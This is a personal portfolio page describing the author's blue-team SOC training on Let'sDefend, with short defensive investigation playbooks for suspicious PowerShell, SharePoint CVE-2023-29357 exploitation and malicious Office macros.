From tactical supply chains to tactical cyber defense.

PCAP Quick Profiler

Portfolio Spotlight · Live triage demo

Let’sDefend Blue Team Lab Profile

Hands-on SOC investigations · Alerts, IR, & threat hunting

Suspicious PowerShell Execution

Event IDs 4104, 4688, Sysmon 1/7/11

Detect and investigate encoded or living-off-the-land PowerShell activity, with a focus on command-line logging and child process behavior.

• Hunt for suspicious powershell.exe command lines
• Correlate process tree with network connections
• Export script blocks and decode payloads
• Verify persistence and credentials impact

SharePoint EoP (CVE-2023-29357)

Public-facing app exploit → privilege escalation

Playbook for investigating suspicious SharePoint activity, mapping evidence to MITRE ATT&CK and confirming impact.

• Review SharePoint / IIS logs for exploit patterns
• Correlate authentication changes & new privileges
• Check for webshells or uploaded payloads
• Validate containment and patch status

Malicious Office → Initial Access

Phishing → macro → child process

Playbook focused on suspicious Office documents spawning scripting engines or LOLBINs on endpoints.

• Identify email + attachment source in mail logs
• Correlate WINWORD.EXE / EXCEL.EXE child processes
• Extract IOCs from dropped files and network traffic
• Document user impact and recommend awareness actions

Let’sDefend Blue Team Lab

Active SOC training · Realistic alert queues

I regularly work through SIEM alerts, phishing cases, and incident simulations on Let’sDefend to sharpen my triage and investigation flow.

• Focus on alert triage, evidence gathering, and root-cause analysis
• Practice mapping findings to MITRE ATT&CK
• Document outcomes in SOC-style reports and playbooks

View my Let’sDefend profile ↗

Cyber Range & Training Badges

Platforms I use to stay sharp.

I treat these platforms like a real SOC: hypothesis → evidence → conclusion → report.